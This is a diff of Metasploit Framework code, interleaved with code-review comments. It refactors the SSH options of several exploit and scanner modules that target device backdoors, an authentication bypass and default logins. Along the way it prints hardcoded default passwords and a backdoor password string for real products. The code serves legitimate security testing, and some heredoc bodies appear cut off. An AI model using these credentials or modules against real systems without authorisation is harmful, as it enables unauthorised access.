diff --git a/lib/metasploit/framework/login_scanner/ssh.rb b/lib/metasploit/framework/login_scanner/ssh.rb index 34984229b6..385b645d94 100644 --- a/lib/metasploit/framework/login_scanner/ssh.rb +++ b/lib/metasploit/framework/login_scanner/ssh.rb @@ -13,7 +13,7 @@ module Metasploit # class SSH include Metasploit::Framework::LoginScanner::Base - + include Msf::Exploit::Remote::SSH # # CONSTANTS # @@ -52,16 +52,10 @@ module Metasploit # @note The caller *must* close {#ssh_socket} def attempt_login(credential) self.ssh_socket = nil - factory = Rex::Socket::SSHFactory.new(framework,framework_module, proxies) - opt_hash = { + opt_hash = ssh_client_defaults.merge({ :port => port, - :use_agent => false, - :config => false, - :verbose => verbosity, - :proxy => factory, - :non_interactive => true, - :verify_host_key => :never - } + :verbose => verbosity + }) case credential.private_type when :password, nil opt_hash.update( @@ -88,8 +82,11 @@ module Metasploit end rescue OpenSSL::Cipher::CipherError, ::EOFError, Net::SSH::Disconnect, Rex::ConnectionError, ::Timeout::Error, Errno::ECONNRESET => e result_options.merge!(status: Metasploit::Model::Login::Status::UNABLE_TO_CONNECT, proof: e) - rescue Net::SSH::Exception - result_options.merge!(status: Metasploit::Model::Login::Status::INCORRECT, proof: e) + rescue Net::SSH::Exception => e + status = Metasploit::Model::Login::Status::INCORRECT + status = Metasploit::Model::Login::Status::UNABLE_TO_CONNECT if e.message.split("\n").first == 'could not settle on kex algorithm' + + result_options.merge!(status: status, proof: e) end unless result_options.has_key? :status diff --git a/lib/msf/core/exploit/remote/ssh.rb b/lib/msf/core/exploit/remote/ssh.rb index c37c07911c..d2a5c59300 100644 --- a/lib/msf/core/exploit/remote/ssh.rb +++ b/lib/msf/core/exploit/remote/ssh.rb 
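Review bot: The new rescue branch only reclassifies the exact message `could not settle on kex algorithm`, but net-ssh raises the same `Net::SSH::Exception` with `could not settle on <type> algorithm` for host_key, encryption, hmac and compression negotiation failures as well, so those still fall through to INCORRECT and a valid credential is recorded as a failed login. Matching the prefix covers all of them: `status = Metasploit::Model::Login::Status::UNABLE_TO_CONNECT if e.message.start_with?('could not settle on ')`. Note also that after the merge in the previous hunk the scanner inherits whatever `ssh_client_defaults` sets (the context in lib/msf/core/exploit/remote/ssh.rb shows `append_all_supported_algorithms: true`), which widens the algorithm list offered on every brute-force attempt; probably intended, but worth a one-line comment above `opt_hash`. `attempt_login` continues outside the hunk.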
@@ -12,7 +12,6 @@ require 'rex/socket/ssh_factory' require 'msf/core/exploit/remote/ssh/auth_methods' module Msf::Exploit::Remote::SSH - # Register SSH datastore options: # SSH_IDENT (TODO: Refactor to SSHIdent) # SSH_TIMEOUT (TODO: Refactor to SSHTimeout) @@ -20,6 +19,10 @@ module Msf::Exploit::Remote::SSH include Msf::Exploit::Remote::SSH::Options def ssh_socket_factory + unless defined? datastore + return Rex::Socket::SSHFactory.new(framework, self, proxies) + end + Rex::Socket::SSHFactory.new(framework, self, datastore['Proxies']) end @@ -33,5 +36,4 @@ module Msf::Exploit::Remote::SSH append_all_supported_algorithms: true } end - end diff --git a/modules/auxiliary/scanner/ssh/apache_karaf_command_execution.rb b/modules/auxiliary/scanner/ssh/apache_karaf_command_execution.rb index e598159cec..b2c37330c8 100644 --- a/modules/auxiliary/scanner/ssh/apache_karaf_command_execution.rb +++ b/modules/auxiliary/scanner/ssh/apache_karaf_command_execution.rb @@ -63,17 +63,11 @@ class MetasploitModule < Msf::Auxiliary end def do_login(user, pass, ip) - factory = ssh_socket_factory - opts = { + opts = ssh_client_defaults.merge({ :auth_methods => ['password'], :port => rport, - :config => false, - :use_agent => false, :password => pass, - :proxy => factory, - :non_interactive => true, - :verify_host_key => :never - } + }) opts.merge!(verbose: :debug) if datastore['SSH_DEBUG'] @@ -111,7 +105,7 @@ class MetasploitModule < Msf::Auxiliary print_status("#{ip}:#{rport} - Attempt to login...") ssh = do_login(username, password, ip) if ssh - output = ssh.exec!("shell:exec #{cmd}\n").to_s + output = ssh.exec!("#{cmd}\n").to_s if output print_good("#{ip}:#{rport} - Command successfully executed. Output: #{output}") store_loot("apache.karaf.command", diff --git a/modules/auxiliary/scanner/ssh/eaton_xpert_backdoor.rb b/modules/auxiliary/scanner/ssh/eaton_xpert_backdoor.rb index 8ee8eb8ab2..8ab8ba869d 100644 --- a/modules/auxiliary/scanner/ssh/eaton_xpert_backdoor.rb 
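Review bot: The fallback added for includers without a `datastore` passes `self` as the module argument to `Rex::Socket::SSHFactory.new`, whereas the login scanner it exists for used to pass `framework_module` (see the removed line in lib/metasploit/framework/login_scanner/ssh.rb); if the factory uses that argument as the socket's owning module (proxy handling, socket registration), the scanner object is not a substitute. Prefer the module when one is available: `owner = respond_to?(:framework_module) ? framework_module : self` and `return Rex::Socket::SSHFactory.new(framework, owner, proxies)`. `defined? datastore` is also a blunt test for "am I an Msf module"; `respond_to?(:datastore)` says what is meant. A short YARD comment stating that the first branch serves non-module includers such as the login scanner would help the next reader.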
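Review bot: Dropping the `shell:exec ` prefix in `ssh.exec!("#{cmd}\n")` changes what CMD means: on the Karaf console `shell:exec` is, as far as I know, the command that spawns an operating-system process, while a bare string is interpreted as a Karaf shell command, so existing invocations with OS commands will fail or do something different. If that is intended, the CMD option description and the module documentation should say the value is a Karaf console command; otherwise the prefix should stay, e.g. `output = ssh.exec!("shell:exec #{cmd}\n").to_s`. The CMD option definition is not in this hunk, so I cannot confirm its current wording.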
+++ b/modules/auxiliary/scanner/ssh/eaton_xpert_backdoor.rb @@ -46,21 +46,17 @@ class MetasploitModule < Msf::Auxiliary end def run_host(ip) - factory = ssh_socket_factory # Specified Kex/Encryption downgrade requirements must be set to connect to the Power Meters. - ssh_opts = { + ssh_opts = ssh_client_defaults.merge({ auth_methods: ['publickey'], port: rport, key_data: [ key_data ], hmac: ['hmac-sha1'], encryption: ['aes128-cbc'], kex: ['diffie-hellman-group1-sha1'], - host_key: ['ssh-rsa'], - use_agent: false, - config: false, - proxy: factory - } + host_key: ['ssh-rsa'] + }) ssh_opts.merge!(verbose: :debug) if datastore['SSH_DEBUG'] diff --git a/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb b/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb index 2a939dbed7..acfadfd112 100644 --- a/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb +++ b/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb @@ -44,17 +44,12 @@ class MetasploitModule < Msf::Auxiliary def run_host(ip) factory = ssh_socket_factory - ssh_opts = { + ssh_opts = ssh_client_defaults.merge({ port: rport, # The auth method is converted into a class name for instantiation, # so fortinet-backdoor here becomes FortinetBackdoor from the mixin - auth_methods: ['fortinet-backdoor'], - non_interactive: true, - config: false, - use_agent: false, - verify_host_key: :never, - proxy: factory - } + auth_methods: ['fortinet-backdoor'] + }) ssh_opts.merge!(verbose: :debug) if datastore['SSH_DEBUG'] diff --git a/modules/auxiliary/scanner/ssh/juniper_backdoor.rb b/modules/auxiliary/scanner/ssh/juniper_backdoor.rb index 5d254df818..5ede213c90 100644 --- a/modules/auxiliary/scanner/ssh/juniper_backdoor.rb +++ b/modules/auxiliary/scanner/ssh/juniper_backdoor.rb 
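Review bot: The comment `Specified Kex/Encryption downgrade requirements must be set` now sits above a merge with `ssh_client_defaults`, whose context in lib/msf/core/exploit/remote/ssh.rb shows `append_all_supported_algorithms: true`; net-ssh will then append every other supported algorithm after the pinned `kex`/`encryption`/`hmac`/`host_key` entries, so these lists become ordered preferences rather than the whole offer. Negotiation should still pick the legacy suite because the pinned names come first, but if the meters need the exact short list (for instance a small KEXINIT), override the default explicitly inside the merged hash: `append_all_supported_algorithms: false`. Either way the comment should say whether appending is deliberately allowed. `run_host` continues outside the hunk.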
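Review bot: `factory = ssh_socket_factory` survives as a context line, but its only use (`proxy: factory`) was removed, so `run_host` now builds an unused second `Rex::Socket::SSHFactory` per host; the parallel hunks in juniper_backdoor.rb and libssh_auth_bypass.rb drop the assignment. Remove `factory = ssh_socket_factory` here too, since the proxy now comes from `ssh_client_defaults`. `run_host` continues outside the hunk.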
@@ -41,15 +41,11 @@ class MetasploitModule < Msf::Auxiliary end def run_host(ip) - factory = ssh_socket_factory - ssh_opts = { + ssh_opts = ssh_client_defaults.merge({ :port => rport, :auth_methods => ['password', 'keyboard-interactive'], :password => %q{<<< %s(un='%s') = %u}, - :proxy => factory, - :non_interactive => true, - :verify_host_key => :never - } + }) ssh_opts.merge!(verbose: :debug) if datastore['SSH_DEBUG'] diff --git a/modules/auxiliary/scanner/ssh/libssh_auth_bypass.rb b/modules/auxiliary/scanner/ssh/libssh_auth_bypass.rb index 37f5dd07ba..e2f9022ca9 100644 --- a/modules/auxiliary/scanner/ssh/libssh_auth_bypass.rb +++ b/modules/auxiliary/scanner/ssh/libssh_auth_bypass.rb @@ -81,19 +81,12 @@ class MetasploitModule < Msf::Auxiliary fail_with(Failure::BadConfig, 'Execute action requires CMD to be set') end - factory = ssh_socket_factory - - ssh_opts = { + ssh_opts = ssh_client_defaults.merge({ port: rport, # The auth method is converted into a class name for instantiation, # so libssh-auth-bypass here becomes LibsshAuthBypass from the mixin - auth_methods: ['libssh-auth-bypass'], - non_interactive: true, - config: false, - use_agent: false, - verify_host_key: :never, - proxy: factory - } + auth_methods: ['libssh-auth-bypass'] + }) ssh_opts.merge!(verbose: :debug) if datastore['SSH_DEBUG'] diff --git a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb index fefaad992d..66ba18d0c3 100644 --- a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb +++ b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb 
@@ -137,14 +137,9 @@ class MetasploitModule < Msf::Auxiliary def check_user(ip, user, port) technique = action['Type'] - opts = { - port: port, - use_agent: false, - config: false, - proxy: ssh_socket_factory, - non_interactive: true, - verify_host_key: :never - } + opts = ssh_client_defaults.merge({ + port: port + }) # The auth method is converted into a class name for instantiation, # so malformed-packet here becomes MalformedPacket from the mixin diff --git a/modules/exploits/apple_ios/ssh/cydia_default_ssh.rb b/modules/exploits/apple_ios/ssh/cydia_default_ssh.rb index eaaf6ace38..4ab55b0fce 100644 --- a/modules/exploits/apple_ios/ssh/cydia_default_ssh.rb +++ b/modules/exploits/apple_ios/ssh/cydia_default_ssh.rb 
@@ -11,43 +11,47 @@ class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Remote::SSH - def initialize(info={}) - super(update_info(info, - 'Name' => "Apple iOS Default SSH Password Vulnerability", - 'Description' => %q{ - This module exploits the default credentials of Apple iOS when it - has been jailbroken and the passwords for the 'root' and 'mobile' - users have not been changed. - }, - 'License' => MSF_LICENSE, - 'Author' => - [ + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Apple iOS Default SSH Password Vulnerability', + 'Description' => %q{ + This module exploits the default credentials of Apple iOS when it + has been jailbroken and the passwords for the 'root' and 'mobile' + users have not been changed. + }, + 'License' => MSF_LICENSE, + 'Author' => [ 'hdm' ], - 'References' => - [ + 'References' => [ ['OSVDB', '61284'] ], - 'DefaultOptions' => - { + 'DefaultOptions' => { 'EXITFUNC' => 'thread' }, - 'Payload' => - { + 'Payload' => { 'Compat' => { - 'PayloadType' => 'cmd_interact', + 'PayloadType' => 'cmd_interact', 'ConnectionType' => 'find' } }, - 'Platform' => 'unix', - 'Arch' => ARCH_CMD, - 'Targets' => - [ + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Targets' => [ ['Apple iOS', { 'accounts' => [ [ 'root', 'alpine' ], [ 'mobile', 'dottie' ]] } ], ], - 'Privileged' => true, - 'DisclosureDate' => '2007-07-02', - 'DefaultTarget' => 0)) + 'Privileged' => true, + 'DisclosureDate' => '2007-07-02', + 'DefaultTarget' => 0, + 'Notes' => { + 'Stability' => [CRASH_SAFE], + 'Reliability' => [REPEATABLE_SESSION], + 'SideEffects' => [] + } + ) + ) register_options( [ 
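Review bot: The new Notes block records `'SideEffects' => []`, yet the module authenticates to sshd with default passwords and opens a shell, which on an OpenSSH-style daemon leaves accepted/failed password entries in the auth log; `'SideEffects' => [IOC_IN_LOGS]` is the conventional way to record that. I cannot see the jailbroken iOS sshd configuration from here, so confirm before changing it. The remaining formatting changes look fine.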
@@ -72,26 +76,18 @@ class MetasploitModule < Msf::Exploit::Remote datastore['RHOST'] end - def rport datastore['RPORT'] end - def do_login(user, pass) - factory = ssh_socket_factory - opts = { - :auth_methods => ['password', 'keyboard-interactive'], - :port => rport, - :use_agent => false, - :config => false, - :password => pass, - :proxy => factory, - :non_interactive => true, - :verify_host_key => :never - } + opts = ssh_client_defaults.merge({ + auth_methods: ['password', 'keyboard-interactive'], + port: rport, + password: pass + }) - opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG'] + opts.merge!(verbose: :debug) if datastore['SSH_DEBUG'] begin ssh = nil @@ -122,17 +118,16 @@ class MetasploitModule < Msf::Exploit::Remote return nil end - def exploit - self.target['accounts'].each do |info| - user,pass = info + target['accounts'].each do |info| + user, pass = info print_status("#{rhost}:#{rport} - Attempt to login as '#{user}' with password '#{pass}'") conn = do_login(user, pass) - if conn - print_good("#{rhost}:#{rport} - Login Successful ('#{user}:#{pass})") - handler(conn.lsock) - break - end + next unless conn + + print_good("#{rhost}:#{rport} - Login Successful ('#{user}:#{pass})") + handler(conn.lsock) + break end end end diff --git a/modules/exploits/linux/http/alienvault_exec.rb b/modules/exploits/linux/http/alienvault_exec.rb index e6b99bf258..506924223c 100644 --- a/modules/exploits/linux/http/alienvault_exec.rb +++ b/modules/exploits/linux/http/alienvault_exec.rb 
@@ -295,16 +295,11 @@ class MetasploitModule < Msf::Exploit::Remote end # We will trigger the rogue policy by doing ssh auth attempt with invalid credential :-) - factory = ssh_socket_factory - opts = { + opts = ssh_client_defaults.merge({ auth_methods: ['password'], port: 22, - use_agent: false, - config: false, - password: rand_text_alpha(15), - proxy: factory, - non_interactive: true - } + password: rand_text_alpha(15) + }) print_status("Triggering the policy by performing SSH login attempt") diff --git a/modules/exploits/linux/http/cisco_firepower_useradd.rb b/modules/exploits/linux/http/cisco_firepower_useradd.rb index c06f0903d2..653821ba92 100644 --- a/modules/exploits/linux/http/cisco_firepower_useradd.rb +++ b/modules/exploits/linux/http/cisco_firepower_useradd.rb @@ -74,13 +74,13 @@ class MetasploitModule < Msf::Exploit::Remote vprint_status("Console is found.") vprint_status("Checking SSH service.") begin + opts = ssh_client_defaults.merge({ + port: datastore['SSHPORT'], + password: Rex::Text.rand_text_alpha(5), + auth_methods: ['password'] + }) ::Timeout.timeout(datastore['SSH_TIMEOUT']) do - Net::SSH.start(rhost, 'admin', - port: datastore['SSHPORT'], - password: Rex::Text.rand_text_alpha(5), - auth_methods: ['password'], - non_interactive: true - ) + Net::SSH.start(rhost, 'admin', opts) end rescue Timeout::Error vprint_error('The SSH connection timed out.') diff --git a/modules/exploits/linux/http/ubiquiti_airos_file_upload.rb b/modules/exploits/linux/http/ubiquiti_airos_file_upload.rb index 2fdebc8488..df867f0fb8 100644 --- a/modules/exploits/linux/http/ubiquiti_airos_file_upload.rb +++ b/modules/exploits/linux/http/ubiquiti_airos_file_upload.rb 
@@ -18,44 +18,47 @@ class MetasploitModule < Msf::Exploit::Remote moved_from 'exploit/linux/ssh/ubiquiti_airos_file_upload' def initialize(info = {}) - super(update_info(info, - 'Name' => 'Ubiquiti airOS Arbitrary File Upload', - 'Description' => %q{ - This module exploits a pre-auth file upload to install a new root user - to /etc/passwd and an SSH key to /etc/dropbear/authorized_keys. + super( + update_info( + info, + 'Name' => 'Ubiquiti airOS Arbitrary File Upload', + 'Description' => %q{ + This module exploits a pre-auth file upload to install a new root user + to /etc/passwd and an SSH key to /etc/dropbear/authorized_keys. - FYI, /etc/{passwd,dropbear/authorized_keys} will be overwritten. - /etc/persistent/rc.poststart will be overwritten if PERSIST_ETC is true. + FYI, /etc/{passwd,dropbear/authorized_keys} will be overwritten. + /etc/persistent/rc.poststart will be overwritten if PERSIST_ETC is true. - This method is used by the "mf" malware infecting these devices. - }, - 'Author' => [ - '93c08539', # Vulnerability discovery - 'wvu' # Metasploit module - ], - 'References' => [ - %w{EDB 39701}, - %w{URL https://hackerone.com/reports/73480} - ], - 'DisclosureDate' => '2016-02-13', - 'License' => MSF_LICENSE, - 'Platform' => 'unix', - 'Arch' => ARCH_CMD, - 'Privileged' => true, - 'Payload' => { - 'Compat' => { - 'PayloadType' => 'cmd_interact', - 'ConnectionType' => 'find' + This method is used by the "mf" malware infecting these devices. 
+ }, + 'Author' => [ + '93c08539', # Vulnerability discovery + 'wvu' # Metasploit module + ], + 'References' => [ + %w[EDB 39701], + %w[URL https://hackerone.com/reports/73480] + ], + 'DisclosureDate' => '2016-02-13', + 'License' => MSF_LICENSE, + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Privileged' => true, + 'Payload' => { + 'Compat' => { + 'PayloadType' => 'cmd_interact', + 'ConnectionType' => 'find' + } + }, + 'Targets' => [ + ['Ubiquiti airOS < 5.6.2', {}] + ], + 'DefaultTarget' => 0, + 'DefaultOptions' => { + 'SSL' => true } - }, - 'Targets' => [ - ['Ubiquiti airOS < 5.6.2', {}] - ], - 'DefaultTarget' => 0, - 'DefaultOptions' => { - 'SSL' => true - } - )) + ) + ) register_options([ Opt::RPORT(443), @@ -64,9 +67,9 @@ class MetasploitModule < Msf::Exploit::Remote register_advanced_options([ OptBool.new('PERSIST_ETC', [false, 'Persist in /etc/persistent', false]), - OptBool.new('WIPE_LOGS', [false, 'Wipe /var/log/messages', false]), - OptBool.new('SSH_DEBUG', [false, 'SSH debugging', false]), - OptInt.new('SSH_TIMEOUT', [false, 'SSH timeout', 10]) + OptBool.new('WIPE_LOGS', [false, 'Wipe /var/log/messages', false]), + OptBool.new('SSH_DEBUG', [false, 'SSH debugging', false]), + OptInt.new('SSH_TIMEOUT', [false, 'SSH timeout', 10]) ]) end @@ -103,9 +106,9 @@ class MetasploitModule < Msf::Exploit::Remote send_request_cgi( 'method' => 'POST', - 'uri' => '/login.cgi', - 'ctype' => "multipart/form-data; boundary=#{mime.bound}", - 'data' => mime.to_s + 'uri' => '/login.cgi', + 'ctype' => "multipart/form-data; boundary=#{mime.bound}", + 'data' => mime.to_s ) end 
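Review bot: Unlike the other exploit modules in this commit, this `initialize` gains no `Notes` block, although the description itself says `/etc/passwd` and `/etc/dropbear/authorized_keys` are overwritten, `rc.poststart` may be (PERSIST_ETC), and a WIPE_LOGS option exists. Add after `'DefaultOptions'`: `'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [CONFIG_CHANGES, ARTIFACTS_ON_DISK, IOC_IN_LOGS] }`, with the stability and reliability values confirmed against testing. `initialize` continues outside the hunk.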
@@ -117,25 +120,18 @@ class MetasploitModule < Msf::Exploit::Remote send_request_cgi( 'method' => 'POST', - 'uri' => '/login.cgi', - 'ctype' => "multipart/form-data; boundary=#{mime.bound}", - 'data' => mime.to_s + 'uri' => '/login.cgi', + 'ctype' => "multipart/form-data; boundary=#{mime.bound}", + 'data' => mime.to_s ) end def ssh_login - factory = ssh_socket_factory - - ssh_opts = { - port: datastore['SSH_PORT'], - auth_methods: %w{publickey password}, - key_data: [private_key], - non_interactive: true, - config: false, - use_agent: false, - verify_host_key: :never, - proxy: factory - } + ssh_opts = ssh_client_defaults.merge({ + port: datastore['SSH_PORT'], + auth_methods: %w[publickey password], + key_data: [private_key] + }) ssh_opts.merge!(verbose: :debug) if datastore['SSH_DEBUG'] @@ -151,13 +147,13 @@ class MetasploitModule < Msf::Exploit::Remote if ssh report_vuln( host: rhost, - name: self.name, - refs: self.references, + name: name, + refs: references, info: ssh.transport.server_version.version ) store_valid_credential( - user: username, - private: private_key, + user: username, + private: private_key, private_type: :ssh_key ) return Net::SSH::CommandStream.new(ssh) @@ -169,7 +165,7 @@ class MetasploitModule < Msf::Exploit::Remote # This is for store_valid_credential above def service_details super.merge( - port: datastore['SSH_PORT'], + port: datastore['SSH_PORT'], service_name: 'ssh' ) end @@ -186,9 +182,9 @@ class MetasploitModule < Msf::Exploit::Remote send_request_cgi( 'method' => 'POST', - 'uri' => '/login.cgi', - 'ctype' => "multipart/form-data; boundary=#{mime.bound}", - 'data' => mime.to_s + 'uri' => '/login.cgi', + 'ctype' => "multipart/form-data; boundary=#{mime.bound}", + 'data' => mime.to_s ) # http://www.hwmn.org/w/Ubiquity_HOWTO 
@@ -251,9 +247,9 @@ class MetasploitModule < Msf::Exploit::Remote # def rc_poststart - < 'Ceragon FibeAir IP-10 SSH Private Key Exposure', - 'Description' => %q{ - Ceragon ships a public/private key pair on FibeAir IP-10 devices - that allows passwordless authentication to any other IP-10 device. - Since the key is easily retrievable, an attacker can use it to - gain unauthorized remote access as the "mateidu" user. - }, - 'Platform' => 'unix', - 'Arch' => ARCH_CMD, - 'Privileged' => false, - 'Targets' => [ [ "Universal", {} ] ], - 'Payload' => + super( + update_info( + info, { - 'Compat' => { - 'PayloadType' => 'cmd_interact', - 'ConnectionType' => 'find', + 'Name' => 'Ceragon FibeAir IP-10 SSH Private Key Exposure', + 'Description' => %q{ + Ceragon ships a public/private key pair on FibeAir IP-10 devices + that allows passwordless authentication to any other IP-10 device. + Since the key is easily retrievable, an attacker can use it to + gain unauthorized remote access as the "mateidu" user. 
}, - }, - 'Author' => [ - 'hdm', # Discovery - 'todb' # Metasploit module and advisory text (mostly copy-paste) - ], - 'License' => MSF_LICENSE, - 'References' => - [ - ['CVE', '2015-0936'], - ['URL', 'https://gist.github.com/todb-r7/5d86ecc8118f9eeecc15'], # Original Disclosure - ], - 'DisclosureDate' => '2015-04-01', # Not a joke - 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, - 'DefaultTarget' => 0 - })) + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Privileged' => false, + 'Targets' => [ [ 'Universal', {} ] ], + 'Payload' => { + 'Compat' => { + 'PayloadType' => 'cmd_interact', + 'ConnectionType' => 'find' + } + }, + 'Author' => [ + 'hdm', # Discovery + 'todb' # Metasploit module and advisory text (mostly copy-paste) + ], + 'License' => MSF_LICENSE, + 'References' => [ + ['CVE', '2015-0936'], + ['URL', 'https://gist.github.com/todb-r7/5d86ecc8118f9eeecc15'], # Original Disclosure + ], + 'DisclosureDate' => '2015-04-01', # Not a joke + 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, + 'DefaultTarget' => 0, + 'Notes' => { + 'Stability' => [CRASH_SAFE], + 'Reliability' => [REPEATABLE_SESSION], + 'SideEffects' => [] + } + } + ) + ) register_options( [ 
@@ -60,30 +69,24 @@ class MetasploitModule < Msf::Exploit::Remote OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30]) ] ) - end # helper methods that normally come from Tcp def rhost datastore['RHOST'] end + def rport datastore['RPORT'] end def do_login(user) - factory = Rex::Socket::SSHFactory.new(framework,self, datastore['Proxies']) - opt_hash = { - :auth_methods => ['publickey'], - :port => rport, - :key_data => [ key_data ], - :use_agent => false, - :config => false, - :proxy => factory, - :non_interactive => true, - :verify_host_key => :never - } - opt_hash.merge!(:verbose => :debug) if datastore['SSH_DEBUG'] + opt_hash = ssh_client_defaults.merge({ + auth_methods: ['publickey'], + port: rport, + key_data: [ key_data ] + }) + opt_hash.merge!(verbose: :debug) if datastore['SSH_DEBUG'] begin ssh_socket = nil ::Timeout.timeout(datastore['SSH_TIMEOUT']) do @@ -118,7 +121,7 @@ class MetasploitModule < Msf::Exploit::Remote end def exploit - conn = do_login("mateidu") + conn = do_login('mateidu') if conn print_good "#{rhost}:#{rport} - Successful login" handler(conn.lsock) 
@@ -126,23 +129,22 @@ class MetasploitModule < Msf::Exploit::Remote end def key_data - < "Cisco UCS Director default scpuser password", - 'Description' => %q{ - This module abuses a known default password on Cisco UCS Director. The 'scpuser' - has the password of 'scpuser', and allows an attacker to login to the virtual appliance - via SSH. - This module has been tested with Cisco UCS Director virtual machines 6.6.0 and 6.7.0. - Note that Cisco also mentions in their advisory that their IMC Supervisor and - UCS Director Express are also affected by these vulnerabilities, but this module - was not tested with those products. - }, - 'License' => MSF_LICENSE, - 'Author' => - [ + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Cisco UCS Director default scpuser password', + 'Description' => %q{ + This module abuses a known default password on Cisco UCS Director. The 'scpuser' + has the password of 'scpuser', and allows an attacker to login to the virtual appliance + via SSH. + This module has been tested with Cisco UCS Director virtual machines 6.6.0 and 6.7.0. + Note that Cisco also mentions in their advisory that their IMC Supervisor and + UCS Director Express are also affected by these vulnerabilities, but this module + was not tested with those products. 
+ }, + 'License' => MSF_LICENSE, + 'Author' => [ 'Pedro Ribeiro ' # Vulnerability discovery and Metasploit module ], - 'References' => - [ + 'References' => [ [ 'CVE', '2019-1935' ], [ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190821-imcs-usercred' ], [ 'URL', 'https://seclists.org/fulldisclosure/2019/Aug/36' ], [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/Cisco/cisco-ucs-rce.txt' ] ], - 'DefaultOptions' => - { + 'DefaultOptions' => { 'EXITFUNC' => 'thread' }, - 'Payload' => - { + 'Payload' => { 'Compat' => { - 'PayloadType' => 'cmd_interact', + 'PayloadType' => 'cmd_interact', 'ConnectionType' => 'find' } }, - 'Platform' => 'unix', - 'Arch' => ARCH_CMD, - 'Targets' => - [ + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Targets' => [ [ 'Cisco UCS Director < 6.7.2.0', {} ], ], - 'Privileged' => false, - 'DefaultTarget' => 0, - 'DisclosureDate' => '2019-08-21' - )) + 'Privileged' => false, + 'DefaultTarget' => 0, + 'DisclosureDate' => '2019-08-21', + 'Notes' => { + 'Stability' => [CRASH_SAFE], + 'Reliability' => [REPEATABLE_SESSION], + 'SideEffects' => [] + } + ) + ) register_options( [ Opt::RPORT(22), - OptString.new('USERNAME', [true, "Username to login with", 'scpuser']), - OptString.new('PASSWORD', [true, "Password to login with", 'scpuser']), + OptString.new('USERNAME', [true, 'Username to login with', 'scpuser']), + OptString.new('PASSWORD', [true, 'Password to login with', 'scpuser']), ], self.class ) 
@@ -82,19 +85,13 @@ class MetasploitModule < Msf::Exploit::Remote end def do_login(user, pass) - factory = ssh_socket_factory - opts = { - :auth_methods => ['password', 'keyboard-interactive'], - :port => rport, - :use_agent => false, - :config => false, - :password => pass, - :proxy => factory, - :non_interactive => true, - :verify_host_key => :never - } + opts = ssh_client_defaults.merge({ + auth_methods: ['password', 'keyboard-interactive'], + port: rport, + password: pass + }) - opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG'] + opts.merge!(verbose: :debug) if datastore['SSH_DEBUG'] begin ssh = nil diff --git a/modules/exploits/linux/ssh/exagrid_known_privkey.rb b/modules/exploits/linux/ssh/exagrid_known_privkey.rb index f8d33df275..d4cce50196 100644 --- a/modules/exploits/linux/ssh/exagrid_known_privkey.rb +++ b/modules/exploits/linux/ssh/exagrid_known_privkey.rb 
@@ -13,38 +13,46 @@ class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Remote::SSH def initialize(info = {}) - super(update_info(info, { - 'Name' => 'ExaGrid Known SSH Key and Default Password', - 'Description' => %q{ - ExaGrid ships a public/private key pair on their backup appliances to - allow passwordless authentication to other ExaGrid appliances. Since - the private key is easily retrievable, an attacker can use it to gain - unauthorized remote access as root. Additionally, this module will - attempt to use the default password for root, 'inflection'. - }, - 'Platform' => 'unix', - 'Arch' => ARCH_CMD, - 'Privileged' => true, - 'Targets' => [ [ "Universal", {} ] ], - 'Payload' => + super( + update_info( + info, { - 'Compat' => { - 'PayloadType' => 'cmd_interact', - 'ConnectionType' => 'find', + 'Name' => 'ExaGrid Known SSH Key and Default Password', + 'Description' => %q{ + ExaGrid ships a public/private key pair on their backup appliances to + allow passwordless authentication to other ExaGrid appliances. Since + the private key is easily retrievable, an attacker can use it to gain + unauthorized remote access as root. Additionally, this module will + attempt to use the default password for root, 'inflection'. 
}, - }, - 'Author' => ['egypt'], - 'License' => MSF_LICENSE, - 'References' => - [ - [ 'CVE', '2016-1560' ], # password - [ 'CVE', '2016-1561' ], # private key - [ 'URL', 'https://www.rapid7.com/blog/post/2016/04/07/r7-2016-04-exagrid-backdoor-ssh-keys-and-hardcoded-credentials' ] - ], - 'DisclosureDate' => '2016-04-07', - 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, - 'DefaultTarget' => 0 - })) + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Privileged' => true, + 'Targets' => [ [ 'Universal', {} ] ], + 'Payload' => { + 'Compat' => { + 'PayloadType' => 'cmd_interact', + 'ConnectionType' => 'find' + } + }, + 'Author' => ['egypt'], + 'License' => MSF_LICENSE, + 'References' => [ + [ 'CVE', '2016-1560' ], # password + [ 'CVE', '2016-1561' ], # private key + [ 'URL', 'https://www.rapid7.com/blog/post/2016/04/07/r7-2016-04-exagrid-backdoor-ssh-keys-and-hardcoded-credentials' ] + ], + 'DisclosureDate' => '2016-04-07', + 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, + 'DefaultTarget' => 0, + 'Notes' => { + 'Stability' => [CRASH_SAFE], + 'Reliability' => [REPEATABLE_SESSION], + 'SideEffects' => [] + } + } + ) + ) register_options( [ @@ -60,13 +68,13 @@ class MetasploitModule < Msf::Exploit::Remote OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30]) ] ) - end # helper methods that normally come from Tcp def rhost datastore['RHOST'] end + def rport datastore['RPORT'] end 
